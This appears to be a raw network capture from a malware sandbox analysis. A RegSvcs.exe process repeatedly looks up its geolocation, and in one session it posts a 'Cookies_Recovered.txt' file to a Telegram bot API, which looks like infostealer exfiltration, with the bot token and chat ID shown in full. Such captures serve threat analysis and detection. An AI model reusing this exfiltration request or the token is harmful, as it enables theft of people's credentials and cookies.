                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.555420104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-11 00:27:59 UTC851INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870068
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tT6KzFEOOD8kBk6kdJraf8Rkd1BHZxJ4TyA8ubG9uFJZYMEA8g3KpOl%2F0vZRXrPDd6D6t2I6tHSj7oYssBeUA9uSUISVBN8bY1O76tCmsonm7Uh8XAaJaVwQuR9A5XODDLF3dfj0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8bf6ee38c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1949&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1483739&cwnd=223&unsent_bytes=0&cid=fa3ccdc18d3584fa&ts=162&x=0"
                                                                                                                  2025-01-11 00:27:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.555431104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:00 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-11 00:28:00 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870069
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXmF61woMiKNTKfT1fPcdDapc75BnlP2DlTxULD9SXbSZEzovmyf34ZqEq2NOiNVY2zjlCynjjq08HvlvotWwxRLjpt%2FwHlxepOHvPZvjXPNeAnLTgUcaF%2FBoOMDvctOidiedsLY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8c79b5942d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1556&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1838790&cwnd=229&unsent_bytes=0&cid=0de15ada89e902b2&ts=142&x=0"
                                                                                                                  2025-01-11 00:28:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.555432149.154.167.2204432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:00 UTC352OUTPOST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1279
                                                                                                                  2025-01-11 00:28:00 UTC1279OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 36 63 35 66 39 63 37 32 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 37 36 34 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20
                                                                                                                  Data Ascii: --------------------------8dd326c5f9c7285Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:376483Date and Time: 10/01/2025
                                                                                                                  2025-01-11 00:28:01 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:00 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 56
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:28:01 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.555443104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:01 UTC851INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870070
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=botgIGwfUs42OYOBRuUZo0nPi4UUdIm7YzFy8Ct32fK1WDxl6OkI7t%2B2eKB7DpFxNyOOIIVrudFfcGtFGUCH5vEK41n62XPVUh1aWnVLkfMcj1mT4sHbonP72m3IN80m75Xg7lCP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8cf8d5242d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1821584&cwnd=229&unsent_bytes=0&cid=2c38c2bcdb4931c7&ts=156&x=0"
                                                                                                                  2025-01-11 00:28:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.555451104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:03 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870072
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISoEpihuglkg7z2t6Z8Y%2F9m9CcX%2BBkQBsqnvF%2BgGROBCdyYnzYs9%2BUtu3PLJZB2Y4torlcegJyfDkpOoUH3zWiNm%2FxeO3Z8hiBi2ifABpDKqh8pomhTP8xV2ry3vti4Apu911Orb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8d7a84fc443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1647&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1742243&cwnd=244&unsent_bytes=0&cid=ff55f91d1fea5921&ts=154&x=0"
                                                                                                                  2025-01-11 00:28:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.555463104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:04 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:04 UTC866INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870073
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFc4e0V50goW0f4QbGWUjSw4p244M44qQ6J6l4noMK5M%2BIMLfV5TcTB0%2BGszJWPAi%2BMV0h%2FUhYNEewY68tkP35O%2FI8rodknwZOvvc0pPLTkoNrglHVt%2BpAQHTdrxXnGDQ%2FJTsfhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8e04fc38c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=37297&min_rtt=1993&rtt_var=21769&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1465127&cwnd=223&unsent_bytes=0&cid=c561a148e34cc432&ts=165&x=0"
                                                                                                                  2025-01-11 00:28:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.555474104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:05 UTC854INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:05 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870074
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp5b3G6qDVO2lmOwcMymKfNMYd3RQEXR7Hf0qoPkECyO5GsB3SWGCcY5jQyENMbUmrmpKpfRtfAokaygj5XRslq2G2Ev8dMlyVOASyeI%2Bx0Y8zjtPvIPogsDttumRt%2B98WAoKeCW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8e86e1b43ee-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9916&min_rtt=2215&rtt_var=5611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1318284&cwnd=228&unsent_bytes=0&cid=d0b8f392207e9639&ts=171&x=0"
                                                                                                                  2025-01-11 00:28:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.555482104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:07 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:07 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870076
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwQt%2Bo4DccRs0O6GhbxptQvwPeJsTgdBdrfna%2BPV8S2PeLgScjyHvq56g58ECQjjfNK2QAlweXU2oi2tiEI3ZmaA99CLiVuDnABhUsV7dANOl1%2BbI1BFyUD969Frhq%2FRUhO%2FL6NO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8f03df0c443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1679&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1706604&cwnd=244&unsent_bytes=0&cid=0942defcd6e17cc7&ts=128&x=0"
                                                                                                                  2025-01-11 00:28:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.555494104.21.80.14436148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:28:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:28:08 UTC861INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:08 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870077
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12HunuiWOoo9Ez5ZrSmB5f2epLBP7OdMpqSftQibZ%2FWHC4%2FdSjGFthWJ7%2BmoX0iwMl1KmlP%2BwTmvPeFmN4CG4CdReEaJAU%2FNMxF3qfay2fkVYwcnyNg3y%2BuxnlHY4WHNCl0LB3C3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8f81cea42d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1537&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1833019&cwnd=229&unsent_bytes=0&cid=bab59587099f5f05&ts=152&x=0"
